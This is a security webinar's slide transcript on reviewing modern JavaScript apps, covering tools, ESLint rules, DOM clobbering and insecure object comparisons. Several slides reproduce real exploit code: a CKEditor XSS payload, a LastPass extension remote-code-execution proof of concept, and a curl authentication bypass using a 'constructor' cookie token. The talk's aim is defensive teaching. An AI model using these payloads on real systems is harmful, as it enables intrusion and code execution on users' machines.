SlideShare a Scribd company logo

Webinar–Reviewing Modern JavaScript Applications

Synopsys Software Integrity Group, profile picture
Synopsys Software Integrity Group

The document discusses modern JavaScript application security, emphasizing the importance of understanding framework vulnerabilities, developer tools for security analysis, and managing known issues in JavaScript libraries. It highlights real-life examples of security flaws, such as cross-site scripting and DOM clobbering, while recommending specific tools like ESLint and npm audit for effective security practices. The conclusion stresses the need for regular code reviews, automated processes, and the use of static analysis tools to enhance application security.

Software
1 of 44
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
© 2019 Synopsys, Inc.1 Reviewing Modern JavaScript Applications Lewis Ardern, Senior Security Consultant, Synopsys Software Integrity Group April 29, 2019
© 2019 Synopsys, Inc.2 About me Senior Security Consultant, Synopsys Software Integrity Group – Consultant at formerly Cigital Prior to Cigital • B.Sc. in computer security and ethical hacking – Founder of the Leeds Ethical Hacking Society • Software developer • Security consultant About Synopsys • Historically all about hardware • Software Integrity Group formed to tackle software • Team consisting of well-known organizations – Black Duck – Coverity – Codenomicon – Cigital – Codiscope twitter.com/LewisArdern Lewis Ardern Senior Consultant Software Integrity Group SIG Consulting
© 2019 Synopsys, Inc.3 JavaScript landscape
© 2019 Synopsys, Inc.4 JavaScript landscape • Runs everywhere: browsers, servers, mobile, IoT devices • Lots of frameworks, high levels of abstraction • Move toward safe-by-default frameworks Database MongoDB Server Node.js/Express.js Client Angular
© 2019 Synopsys, Inc.5 Life as we know it “For the sixth year in a row, JavaScript is the most commonly used programming language.” —2018 Stack Overflow Developer Survey https://insights.stackoverflow.com/survey/2016
© 2019 Synopsys, Inc.6 Let’s not be REACTive! • Frameworks can offer enormous security benefits at the expense of outpacing existing security tools • It is important to understand the specific security characteristics and guarantees of any framework you deploy • Framework features can sometimes be abused – http://blog.portswigger.net/2017/09/abusing-javascript- frameworks-to-bypass.html • Teams transition / adopt different frameworks in rapid succession
© 2019 Synopsys, Inc.7 Modern JavaScript analysis Security professionals need to embrace developer tools to effectively identify security issues • Live in the browser console • Debug effectively • Weaponize developer tools to identify security issues • Commercial products (not covered today)
© 2019 Synopsys, Inc.8 What today’s talk covers Real-life examples from domain-specific experts Recommended tools to use Lesser-known JavaScript bugs
© 2019 Synopsys, Inc.9 Example 1 • One of the _known_ edge cases with React is that you can provide URI schemes such as `javascript:alert(0)` and get cross-site scripting via an `href` tag • In this HackerOne report, cross-site scripting led to remote code execution due to the steam:// URI used to interact with the steam client https://hackerone.com/reports/409850
© 2019 Synopsys, Inc.10 Video @zemnmez cross-site scripting against https://steamcommunity.com
© 2019 Synopsys, Inc.11 What did we see? Using the Chrome Developer Console • Beautifying the code • Searching for functions • Debugging client-side values • Overriding values on the fly inside the console • Backticks to bypass controls Knowledge of React pitfalls https://hackerone.com/reports/409850
© 2019 Synopsys, Inc.12 Example 2 LiveOverflow’s pop-under RE • Anti-debugging • Various bypass techniques • Deobfuscating JavaScript • Debugging locally • Using proxies • Weird browser quirks https://www.youtube.com/watch?v=8UqHCrGdxOM
© 2019 Synopsys, Inc.13 Example 3 Gareth Heyes’ AngularJS research • Deep understanding of JavaScript • Auditing framework code • DOM manipulation • Inspecting objects && prototype overriding https://portswigger.net/blog/dom-based-angularjs-sandbox-escapes https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs
© 2019 Synopsys, Inc.14 Products that perform JavaScript dataflow analysis: • Coverity Scan • LGTM Tools that look for areas of interest: • Tarnish • JSHint • JSLint • ESLint – Code Climate—nodesecurity plugin • TSLint – tslint-angular-security Tools that look for known issues in JavaScript libraries: • Retire.js • npm audit • yarn audit • GitHub • Snyk • auditjs Tools that deobfuscate JavaScript: • Closure Compiler • JStillery • unminify JavaScript analysis tools Referencing only projects that either are open source or scan open source
© 2019 Synopsys, Inc.15 React https://chrome.google.com/webstore/detail/react-developer- tools/fmkadmapgofadopljbjfkapdkoienihi?hl=en AngularJS https://chrome.google.com/webstore/detail/angularjs- batarang/ighdmehidhipcmcojjgiloacoafjmpfk?hl=en Angular https://augury.rangle.io/ Vue https://github.com/vuejs/vue-devtools Framework analysis browser extensions Just because “production mode is set” doesn’t mean they can’t be used for live apps https://lh3.googleusercontent.com/GjX6Q3_FVJfc0DqE2wiPKkgOfth6otzV-D7GV- wB6sH5_t1oodMaHOBLsYOLeydb85bKWu6X=w640-h400-e365
© 2019 Synopsys, Inc.16 Known issues in JavaScript libraries Always check for known security issues • GitHub automatically reports security issues • Depending on project type, use tools: Example Command npm npm audit yarn yarn audit bower auditjs --bower bower.json Client-side JavaScript retire --js /path/ Node.js open source snyk test
© 2019 Synopsys, Inc.17 ESLint • ESLint is an open source pluggable linting utility for JavaScript • Linters parse ASTs to identify code quality and security issues • ESLint was created to allow developers to enforce rules • Can be hooked into the development release cycle – Many developers do not allow code to be pushed with ESLint issues flagged – You can create Git hooks – Can be part of CI/CD pipeline • Allows custom rules to enforce domain specific guidance
© 2019 Synopsys, Inc.18 ESLint ESLint is now the go-to tool for JavaScript developers https://stateofjs.com/2017/other-tools/
© 2019 Synopsys, Inc.19 ESLint security rules ESLint can help security consultants look for points of interest Default security rule configs • Node.js https://github.com/nodesecurity/eslint-config-nodesecurity • Vanilla JS https://github.com/mozfreddyb/eslint-config-scanjs • AngularJS https://github.com/LewisArdern/eslint-plugin-angularjs-security-rules • React https://github.com/yannickcr/eslint-plugin-react#list-of-supported-rules Security rules • eslint-plugin-scanjs • eslint-plugin-security • eslint-plugin-react • eslint-plugin-angularjs-security • eslint-plugin-no-wildcard-postmessage • eslint-plugin-no-unsafe-innerhtml • vue/no-v-html • eslint-plugin-prototype-pollution-security-rules
© 2019 Synopsys, Inc.20 Problem: In AngularJS security assessments, I want to identify problem locations quickly Solution: Create ESLint rules to run on every assessment as a starting point: JavaScript analysis tools for AngularJS https://www.npmjs.com/package/eslint-plugin-angularjs-security-rules
© 2019 Synopsys, Inc.21 Steps to create a rule 1. Create a test with true positive and false positive 2. Walk the JavaScript AST and identify your requirements 3. Create a rule from the AST output 4. Make sure the test passes
© 2019 Synopsys, Inc.22 Creating a test
© 2019 Synopsys, Inc.23 Identifying the requirements
© 2019 Synopsys, Inc.24 Create the rule
© 2019 Synopsys, Inc.25 Testing the rules https://blog.appsecco.com/static-analysis-of-client-side-javascript-for-pen-testers-and-bug-bounty-hunters-f1cb1a5d5288 https://github.com/bkimminich/juice-shop
© 2019 Synopsys, Inc.26 Lesser-known security issues Let’s talk about lesser-known bugs!
© 2019 Synopsys, Inc.27 DOM clobbering Due to DOM specifications, certain HTML attributes have the ability to create values in JavaScript http://jibbering.com/faq/names http://thespanner.co.uk/2013/05/16/dom-clobbering Attributes can be used to define JavaScript values • id • action • form – input – name This can lead to: • Cross-site scripting (XSS) • Remote code execution (RCE) in browser extensions
© 2019 Synopsys, Inc.28 DOM clobbering <html> <head> </head> <body> <test id=“value" foooo=“value" action=“exists"><form> <div id=“valueExists" name=“exists"><form> <script> if (value.action !== undefined) { alert('Dom Clobbering’) } if (value.foooo !== undefined) { // Value does not exist } if (valueExists !== undefined) { alert('DOM Clobbering’) } if (valueExists.exists !== undefined) { // Value does not exist } </script> </body> </html>
© 2019 Synopsys, Inc.29 DOM clobbering <html> <body> <form><input name="ownerDocument"></form> <script> console.log(document.forms[0].ownerDocument) // Should return window.document // Returns <input name="ownerDocument"> </script> </body> </html>
© 2019 Synopsys, Inc.30 DOM clobbering // Exploit Code From Mario’ talk https://www.slideshare.net/x00mario/in-the-dom-no-one-will-hear-you-scream#34 // Exploit <a href="plugins/preview/preview.html#<svg onload=alert(1)>" id="_cke_htmlToLoad" target="_blank">Click me for dolphins!</a> // Vulnerable Code <script> var doc = document; doc.open(); doc.write(window.opener._cke_htmlToLoad); doc.close; delete window.opener._cke_htmlToLoad </script> Exploit that achieved cross-site scripting in CKEditor https://www.slideshare.net/x00mario/in-the-dom-no-one-will-hear-you-scream#34
© 2019 Synopsys, Inc.31 Demo DOM clobbering
© 2019 Synopsys, Inc.32 DOM clobbering function lp_url_is_lastpass(e) { if (null == e) return !1; var t = /^https://([a-z0-9-]+.)?lastpass.(eu|com)//i , n = "https://lastpass.com/"; if ("undefined" != typeof base_url && (n = base_url), 0 == e.indexOf(n) || 0 == e.indexOf("https://lastpass.com/") || 0 == e.indexOf("https://lastpass.eu/")) return !0; if ("undefined" != typeof g_loosebasematching) { var i = lp_gettld_url(e); return new RegExp(i + "/$").test(base_url) } return t.test(e) } ... "openattach" == t.eventtype.value ? sendBG({ cmd: "openattach", attachkey: t.eventdata1.value, data: t.eventdata2.value, mimetype: t.eventdata3.value ... Exploit that achieved remote code execution in LastPass Chrome extension https://bugs.chromium.org/p/project-zero/issues/detail?id=1225&desc=6 Can be set with: x = document.createElement("a"); x.setAttribute("id", "base_url"); Can be set defined with <value id="g_loosebasematching" /> Used to send Remote Procedure Calls (RPC) leading to RCE
© 2019 Synopsys, Inc.33 DOM clobbering <html> <head> <script> function start() { x = document.createElement("a"); x.setAttribute("id", "base_url"); x.setAttribute("href", "//" + document.location.hostname); document.body.appendChild(x); exploit.submit(); } </script> </head> <body onload="start()"> <exploit id="g_loosebasematching" /> <form id="exploit" name="lpwebsiteeventform"> <input type="hidden" name="eventtype" value="openattach"> <input type="hidden" name="eventdata1" value="d44479a4ce97554c24399f651ca76899179dec81c854b38ef2389c3185ae8eec"> <input type="hidden" name="eventdata2" value="!8uK7g5j8Eq08Nr86mhmMxw==|1dSN0jXZSQ51V1ww9rk4DQ=="> <input type="hidden" name="eventdata3" value="other:./../../../../../Desktop/exploit.bat"> <form> </body> </html> Exploit that achieved remote code execution in LastPass Chrome extension https://bugs.chromium.org/p/project-zero/issues/detail?id=1225&desc=6
© 2019 Synopsys, Inc.34 DOM clobbering https://bugs.chromium.org/p/project-zero/issues/attachment?aid=277766&signed_aid=cHmKiER3b1GkZKd_e_0PAA==&inline=1
© 2019 Synopsys, Inc.35 Insecure object comparisons Similar to DOM clobbering, there are many other ways insecure comparisons can happen const SESSIONS = {} const mustBeAuthenticated = (req, res, next) => { if(req.cookies) { const token = req.cookies.token if(token && SESSIONS[token]) { //allow it next() } } res.send('not authorized!') }
© 2019 Synopsys, Inc.36 Comparison table Value Return SESSIONS['invalidString'] False SESSIONS[''] False SESSIONS['constructor'] True SESSIONS['hasOwnPropery'] True
© 2019 Synopsys, Inc.37 What happens when you create an object in JavaScript? const test = {} __proto__: constructor: ƒ Object() hasOwnProperty: ƒ hasOwnProperty() isPrototypeOf: ƒ isProrotypeOf() [...] test['constructor'] === test.constructor //returns true
© 2019 Synopsys, Inc.38 Exploit • This issue is trivial to exploit • Using curl, we can simply run the following command: – curl https://localhost:9000 -H "Cookie: token=constructor" • Alternatively, we can just set the document.cookie value via the browser
© 2019 Synopsys, Inc.39 Demo Insecure object comparisons
© 2019 Synopsys, Inc.40 SESSIONS.has('__proto__'); // false SESSIONS.has('validString'); // true How do we correctly check? Or you can use a Map instead of an Object SESSIONS.hasOwnProperty['__proto__'] // false SESSIONS.hasOwnProperty['validString'] // true
© 2019 Synopsys, Inc.41 Note on authentication • Use a well-tested library like Passport to do authentication –http://www.passportjs.org/ • If rolling your own, use crypto.timingSafeEqual(a, b) –It provides a safe comparison –Also prevents timing attacks!
© 2019 Synopsys, Inc.42 Other issues Prototype pollution • https://www.youtube.com/watch?v=LUsiFV3dsK8 • https://github.com/HoLyVieR/prototype-pollution-nsec18 • https://www.slideshare.net/LewisArdern/dangerous-design-patterns-in-one-line • https://github.com/LewisArdern/eslint-plugin-prototype-pollution-security-rules • https://gist.github.com/LewisArdern/db02e6c37b69c7cb4f1059dc9e536923 Mass assignment • https://talks.amanvir.io/forward-js-san-francisco-security-issues-in-modern-javascript-Jan- 2019.pdf • https://www.owasp.org/index.php/Mass_Assignment_Cheat_Sheet • https://www.npmjs.com/package/mongoose-mass-assign
© 2019 Synopsys, Inc.43 Summary • Adopt and embrace developer tools to identify security issues • Conduct regular code reviews • Measure and track your code quality and security • Automate the process: – ESLint for code linting and npm audit for dependencies – Various static analysis tools for quality and security – Break your CI build if any issues get flagged
Thank You Questions? Email: lewis@ardern.io Website: https://ardern.io Twitter: https://twitter.com/LewisArdern GitHub: https://github.com/LewisArdern LinkedIn: https://www.linkedin.com/in/lewis-ardern-83373a40

More Related Content

PDF
DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...
DevSecCon
 
PDF
Hybrid Cloud Networking
SVForum Cloud SIG
 
PDF
Build advanced chat bots - Steve Sfartz - Codemotion Amsterdam 2017
Codemotion
 
PDF
Using CredHub for Kubernetes Deployments
VMware Tanzu
 
PDF
DevSecOps: Key Controls for Modern Security Success
Puma Security, LLC
 
PDF
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
Lewis Ardern
 
PPTX
(Isc)² secure johannesburg
Tunde Ogunkoya
 
PPTX
DevSecOps: Key Controls to Modern Security Success
Puma Security, LLC
 
DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...
DevSecCon
 
Hybrid Cloud Networking
SVForum Cloud SIG
 
Build advanced chat bots - Steve Sfartz - Codemotion Amsterdam 2017
Codemotion
 
Using CredHub for Kubernetes Deployments
VMware Tanzu
 
DevSecOps: Key Controls for Modern Security Success
Puma Security, LLC
 
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
Lewis Ardern
 
(Isc)² secure johannesburg
Tunde Ogunkoya
 
DevSecOps: Key Controls to Modern Security Success
Puma Security, LLC
 

What's hot (20)

PDF
OWASP SF - Reviewing Modern JavaScript Applications
Lewis Ardern
 
PDF
OWASP Portland - OWASP Top 10 For JavaScript Developers
Lewis Ardern
 
PPTX
How to get along with HATEOAS without letting the bad guys steal your lunch?
Graham Charters
 
PDF
Cloud Native Java with Spring Cloud Services
Chris Sterling
 
PDF
Kubernetes for the Spring Developer
VMware Tanzu
 
PDF
when Apps meet Infrastructure - CodeMotionMilan2018 Keynote - Cisco DevNet - ...
Cisco DevNet
 
PPTX
Microservices and containers networking: Contiv, an industry leading open sou...
Codemotion
 
PDF
Serverless Security: A How-to Guide @ SnowFROC 2019
James Wickett
 
PPTX
Manual JavaScript Analysis Is A Bug
Lewis Ardern
 
PDF
Elevate Your Application Security Program with Burp Suite and ThreadFix
Denim Group
 
PDF
Secure your Application with Google cloud armor
DevOps Indonesia
 
PDF
Getting Single Page Application Security Right
Philippe De Ryck
 
PDF
The DevSecOps Builder’s Guide to the CI/CD Pipeline
James Wickett
 
PDF
Demystifying AuthN/AuthZ Using OIDC & OAuth2
NGINX, Inc.
 
PPTX
Mobile security part 1(Android Apps Pentesting)- Romansh yadav
Romansh Yadav
 
PPTX
Mobile security part 2
Romansh Yadav
 
PPTX
How to Secure Containerized Applications
DevOps.com
 
PDF
The New Ways of DevSecOps - The Secure Dev 2019
James Wickett
 
PDF
Securing Container-Based Applications at the Speed of DevOps
WhiteSource
 
PDF
Synopsys Security Event Israel Presentation: Making AppSec Testing Work in CI/CD
Synopsys Software Integrity Group
 
OWASP SF - Reviewing Modern JavaScript Applications
Lewis Ardern
 
OWASP Portland - OWASP Top 10 For JavaScript Developers
Lewis Ardern
 
How to get along with HATEOAS without letting the bad guys steal your lunch?
Graham Charters
 
Cloud Native Java with Spring Cloud Services
Chris Sterling
 
Kubernetes for the Spring Developer
VMware Tanzu
 
when Apps meet Infrastructure - CodeMotionMilan2018 Keynote - Cisco DevNet - ...
Cisco DevNet
 
Microservices and containers networking: Contiv, an industry leading open sou...
Codemotion
 
Serverless Security: A How-to Guide @ SnowFROC 2019
James Wickett
 
Manual JavaScript Analysis Is A Bug
Lewis Ardern
 
Elevate Your Application Security Program with Burp Suite and ThreadFix
Denim Group
 
Secure your Application with Google cloud armor
DevOps Indonesia
 
Getting Single Page Application Security Right
Philippe De Ryck
 
The DevSecOps Builder’s Guide to the CI/CD Pipeline
James Wickett
 
Demystifying AuthN/AuthZ Using OIDC & OAuth2
NGINX, Inc.
 
Mobile security part 1(Android Apps Pentesting)- Romansh yadav
Romansh Yadav
 
Mobile security part 2
Romansh Yadav
 
How to Secure Containerized Applications
DevOps.com
 
The New Ways of DevSecOps - The Secure Dev 2019
James Wickett
 
Securing Container-Based Applications at the Speed of DevOps
WhiteSource
 
Synopsys Security Event Israel Presentation: Making AppSec Testing Work in CI/CD
Synopsys Software Integrity Group
 
Ad

Similar to Webinar–Reviewing Modern JavaScript Applications (20)

PDF
BSides Leeds - Performing JavaScript Static Analysis
Lewis Ardern
 
PPTX
How to React to JavaScript Insecurity
Ksenia Peguero
 
PDF
Webinar–OWASP Top 10 for JavaScript for Developers
Synopsys Software Integrity Group
 
PDF
The DOM is a Mess @ Yahoo
jeresig
 
PPT
JavaScript Misunderstood
Bhavya Siddappa
 
PPTX
Security testing of YUI powered applications
dimisec
 
PPTX
Web security: Securing Untrusted Web Content in Browsers
Phú Phùng
 
PPTX
Security by the numbers
Eoin Keary
 
PDF
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Mario Heiderich
 
PPT
Reversing JavaScript
Roberto Suggi Liverani
 
PPTX
Web security: Securing untrusted web content at browsers
Phú Phùng
 
PDF
A look at the prevalence of client-side JavaScript vulnerabilities in web app...
IBM Rational software
 
PDF
Web Development in Advanced Threat Prevention
IRJET Journal
 
PDF
Progressive web and the problem of JavaScript
Christian Heilmann
 
PPTX
Pentesting Modern Web Apps: A Primer
Brian Hysell
 
PDF
Node Security: The Good, Bad & Ugly
Bishan Singh
 
PDF
Douglas - Real JavaScript
d0nn9n
 
DOC
Same Origin Policy Weaknesses
kuza55
 
PDF
Black Clouds and Silver Linings in Node.js Security - Liran Tal Snyk OWASP Gl...
Liran Tal
 
PDF
Node.js security tour
Giacomo De Liberali
 
BSides Leeds - Performing JavaScript Static Analysis
Lewis Ardern
 
How to React to JavaScript Insecurity
Ksenia Peguero
 
Webinar–OWASP Top 10 for JavaScript for Developers
Synopsys Software Integrity Group
 
The DOM is a Mess @ Yahoo
jeresig
 
JavaScript Misunderstood
Bhavya Siddappa
 
Security testing of YUI powered applications
dimisec
 
Web security: Securing Untrusted Web Content in Browsers
Phú Phùng
 
Security by the numbers
Eoin Keary
 
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Mario Heiderich
 
Reversing JavaScript
Roberto Suggi Liverani
 
Web security: Securing untrusted web content at browsers
Phú Phùng
 
A look at the prevalence of client-side JavaScript vulnerabilities in web app...
IBM Rational software
 
Web Development in Advanced Threat Prevention
IRJET Journal
 
Progressive web and the problem of JavaScript
Christian Heilmann
 
Pentesting Modern Web Apps: A Primer
Brian Hysell
 
Node Security: The Good, Bad & Ugly
Bishan Singh
 
Douglas - Real JavaScript
d0nn9n
 
Same Origin Policy Weaknesses
kuza55
 
Black Clouds and Silver Linings in Node.js Security - Liran Tal Snyk OWASP Gl...
Liran Tal
 
Node.js security tour
Giacomo De Liberali
 
Ad

More from Synopsys Software Integrity Group (20)

PDF
Webinar–Segen oder Fluch?
Synopsys Software Integrity Group
 
PDF
Webinar–Mobile Application Hardening Protecting Business Critical Apps
Synopsys Software Integrity Group
 
PDF
Webinar–The 2019 Open Source Year in Review
Synopsys Software Integrity Group
 
PDF
Webinar–Best Practices for DevSecOps at Scale
Synopsys Software Integrity Group
 
PDF
Webinar–That is Not How This Works
Synopsys Software Integrity Group
 
PDF
Webinar–You've Got Your Open Source Audit Report–Now What?
Synopsys Software Integrity Group
 
PDF
Webinar–The State of Open Source in M&A Transactions
Synopsys Software Integrity Group
 
PDF
Webinar–5 ways to risk rank your vulnerabilities
Synopsys Software Integrity Group
 
PDF
Do Design Quality and Code Quality Matter in Merger and Acquisition Tech Due ...
Synopsys Software Integrity Group
 
PDF
Webinar–Using Evidence-Based Security
Synopsys Software Integrity Group
 
PDF
Webinar–Delivering a Next Generation Vulnerability Feed
Synopsys Software Integrity Group
 
PDF
Webinar–Financial Services Study Shows Why Investing in AppSec Matters
Synopsys Software Integrity Group
 
PDF
Webinar–What You Need To Know About Open Source Licensing
Synopsys Software Integrity Group
 
PDF
Webinar–Improving Fuzz Testing of Infotainment Systems and Telematics Units U...
Synopsys Software Integrity Group
 
PDF
Webinar–Why All Open Source Scans Aren't Created Equal
Synopsys Software Integrity Group
 
PDF
Webinar–Is Your Software Security Supply Chain a Security Blind Spot?
Synopsys Software Integrity Group
 
PDF
Webinar–Sécurité Applicative et DevSecOps dans un monde Agile
Synopsys Software Integrity Group
 
PDF
Webinar–Creating a Modern AppSec Toolchain to Quantify Service Risks
Synopsys Software Integrity Group
 
PDF
Webinar – Streamling Your Tech Due Diligence Process for Software Assets
Synopsys Software Integrity Group
 
PDF
Webinar – Security Tool Misconfiguration and Abuse
Synopsys Software Integrity Group
 
Webinar–Segen oder Fluch?
Synopsys Software Integrity Group
 
Webinar–Mobile Application Hardening Protecting Business Critical Apps
Synopsys Software Integrity Group
 
Webinar–The 2019 Open Source Year in Review
Synopsys Software Integrity Group
 
Webinar–Best Practices for DevSecOps at Scale
Synopsys Software Integrity Group
 
Webinar–That is Not How This Works
Synopsys Software Integrity Group
 
Webinar–You've Got Your Open Source Audit Report–Now What?
Synopsys Software Integrity Group
 
Webinar–The State of Open Source in M&A Transactions
Synopsys Software Integrity Group
 
Webinar–5 ways to risk rank your vulnerabilities
Synopsys Software Integrity Group
 
Do Design Quality and Code Quality Matter in Merger and Acquisition Tech Due ...
Synopsys Software Integrity Group
 
Webinar–Using Evidence-Based Security
Synopsys Software Integrity Group
 
Webinar–Delivering a Next Generation Vulnerability Feed
Synopsys Software Integrity Group
 
Webinar–Financial Services Study Shows Why Investing in AppSec Matters
Synopsys Software Integrity Group
 
Webinar–What You Need To Know About Open Source Licensing
Synopsys Software Integrity Group
 
Webinar–Improving Fuzz Testing of Infotainment Systems and Telematics Units U...
Synopsys Software Integrity Group
 
Webinar–Why All Open Source Scans Aren't Created Equal
Synopsys Software Integrity Group
 
Webinar–Is Your Software Security Supply Chain a Security Blind Spot?
Synopsys Software Integrity Group
 
Webinar–Sécurité Applicative et DevSecOps dans un monde Agile
Synopsys Software Integrity Group
 
Webinar–Creating a Modern AppSec Toolchain to Quantify Service Risks
Synopsys Software Integrity Group
 
Webinar – Streamling Your Tech Due Diligence Process for Software Assets
Synopsys Software Integrity Group
 
Webinar – Security Tool Misconfiguration and Abuse
Synopsys Software Integrity Group
 

Recently uploaded (20)

PDF
top salesforce developer skills in 2025.pdf
CloudMetic
 
PPTX
Operating system designcfffgfgggggggvggggggggg
rmskumara09
 
PDF
Navsoft: AI-Powered Business Solutions & Custom Software Development
Navsoft
 
PDF
medical staffing services at VALiNTRY
Tiyan Grayson
 
PDF
Internet Downloader Manager (IDM) Crack 6.42 Build 41
ghrom2211g
 
PPTX
Oracle E-Business Suite: A Comprehensive Guide for Modern Enterprises
Conacent Consulting
 
PDF
Why TechBuilder is the Future of Pickup and Delivery App Development (1).pdf
TechBuilder
 
PDF
Addressing The Cult of Project Management Tools-Why Disconnected Work is Hold...
OnePlan Solutions
 
PPTX
Odoo POS Development Services by CandidRoot Solutions
CandidRoot Solutions Private Limited
 
PPTX
L1 - Introduction to python Backend.pptx
MoizAhmed480282
 
PPTX
ManageIQ - Sprint 268 Review - Slide Deck
ManageIQ
 
PDF
SAP S4 Hana Brochure 3 (PTS SYSTEMS AND SOLUTIONS)
pts464036
 
PPTX
Agentic AI : A Practical Guide. Undersating, Implementing and Scaling Autono...
IT IDOL Technologies
 
PDF
Which alternative to Crystal Reports is best for small or large businesses.pdf
Varsha Nayak
 
PDF
2025 Textile ERP Trends: SAP, Odoo & Oracle
Aetos Technologies
 
PDF
Upgrade and Innovation Strategies for SAP ERP Customers
Virendra Rai, PMP
 
PDF
Claude Code: Everyone is a 10x Developer - A Comprehensive AI-Powered CLI Tool
William Chong
 
PDF
T3DD25 TYPO3 Content Blocks - Deep Dive by André Kraus
Andre Kraus
 
PDF
How to Migrate SBCGlobal Email to Yahoo Easily
raymondjones7273
 
PPTX
Introduction to Artificial Intelligence
lohedi9363
 
top salesforce developer skills in 2025.pdf
CloudMetic
 
Operating system designcfffgfgggggggvggggggggg
rmskumara09
 
Navsoft: AI-Powered Business Solutions & Custom Software Development
Navsoft
 
medical staffing services at VALiNTRY
Tiyan Grayson
 
Internet Downloader Manager (IDM) Crack 6.42 Build 41
ghrom2211g
 
Oracle E-Business Suite: A Comprehensive Guide for Modern Enterprises
Conacent Consulting
 
Why TechBuilder is the Future of Pickup and Delivery App Development (1).pdf
TechBuilder
 
Addressing The Cult of Project Management Tools-Why Disconnected Work is Hold...
OnePlan Solutions
 
Odoo POS Development Services by CandidRoot Solutions
CandidRoot Solutions Private Limited
 
L1 - Introduction to python Backend.pptx
MoizAhmed480282
 
ManageIQ - Sprint 268 Review - Slide Deck
ManageIQ
 
SAP S4 Hana Brochure 3 (PTS SYSTEMS AND SOLUTIONS)
pts464036
 
Agentic AI : A Practical Guide. Undersating, Implementing and Scaling Autono...
IT IDOL Technologies
 
Which alternative to Crystal Reports is best for small or large businesses.pdf
Varsha Nayak
 
2025 Textile ERP Trends: SAP, Odoo & Oracle
Aetos Technologies
 
Upgrade and Innovation Strategies for SAP ERP Customers
Virendra Rai, PMP
 
Claude Code: Everyone is a 10x Developer - A Comprehensive AI-Powered CLI Tool
William Chong
 
T3DD25 TYPO3 Content Blocks - Deep Dive by André Kraus
Andre Kraus
 
How to Migrate SBCGlobal Email to Yahoo Easily
raymondjones7273
 
Introduction to Artificial Intelligence
lohedi9363
 

Webinar–Reviewing Modern JavaScript Applications

  • 1. © 2019 Synopsys, Inc.1 Reviewing Modern JavaScript Applications Lewis Ardern, Senior Security Consultant, Synopsys Software Integrity Group April 29, 2019
  • 2. © 2019 Synopsys, Inc.2 About me Senior Security Consultant, Synopsys Software Integrity Group – Consultant at formerly Cigital Prior to Cigital • B.Sc. in computer security and ethical hacking – Founder of the Leeds Ethical Hacking Society • Software developer • Security consultant About Synopsys • Historically all about hardware • Software Integrity Group formed to tackle software • Team consisting of well-known organizations – Black Duck – Coverity – Codenomicon – Cigital – Codiscope twitter.com/LewisArdern Lewis Ardern Senior Consultant Software Integrity Group SIG Consulting
  • 3. © 2019 Synopsys, Inc.3 JavaScript landscape
  • 4. © 2019 Synopsys, Inc.4 JavaScript landscape • Runs everywhere: browsers, servers, mobile, IoT devices • Lots of frameworks, high levels of abstraction • Move toward safe-by-default frameworks Database MongoDB Server Node.js/Express.js Client Angular
  • 5. © 2019 Synopsys, Inc.5 Life as we know it “For the sixth year in a row, JavaScript is the most commonly used programming language.” —2018 Stack Overflow Developer Survey https://insights.stackoverflow.com/survey/2016
  • 6. © 2019 Synopsys, Inc.6 Let’s not be REACTive! • Frameworks can offer enormous security benefits at the expense of outpacing existing security tools • It is important to understand the specific security characteristics and guarantees of any framework you deploy • Framework features can sometimes be abused – http://blog.portswigger.net/2017/09/abusing-javascript- frameworks-to-bypass.html • Teams transition / adopt different frameworks in rapid succession
  • 7. © 2019 Synopsys, Inc.7 Modern JavaScript analysis Security professionals need to embrace developer tools to effectively identify security issues • Live in the browser console • Debug effectively • Weaponize developer tools to identify security issues • Commercial products (not covered today)
  • 8. © 2019 Synopsys, Inc.8 What today’s talk covers Real-life examples from domain-specific experts Recommended tools to use Lesser-known JavaScript bugs
  • 9. © 2019 Synopsys, Inc.9 Example 1 • One of the _known_ edge cases with React is that you can provide URI schemes such as `javascript:alert(0)` and get cross-site scripting via an `href` tag • In this HackerOne report, cross-site scripting led to remote code execution due to the steam:// URI used to interact with the steam client https://hackerone.com/reports/409850
  • 10. © 2019 Synopsys, Inc.10 Video @zemnmez cross-site scripting against https://steamcommunity.com
  • 11. © 2019 Synopsys, Inc.11 What did we see? Using the Chrome Developer Console • Beautifying the code • Searching for functions • Debugging client-side values • Overriding values on the fly inside the console • Backticks to bypass controls Knowledge of React pitfalls https://hackerone.com/reports/409850
  • 12. © 2019 Synopsys, Inc.12 Example 2 LiveOverflow’s pop-under RE • Anti-debugging • Various bypass techniques • Deobfuscating JavaScript • Debugging locally • Using proxies • Weird browser quirks https://www.youtube.com/watch?v=8UqHCrGdxOM
  • 13. © 2019 Synopsys, Inc.13 Example 3 Gareth Heyes’ AngularJS research • Deep understanding of JavaScript • Auditing framework code • DOM manipulation • Inspecting objects && prototype overriding https://portswigger.net/blog/dom-based-angularjs-sandbox-escapes https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs
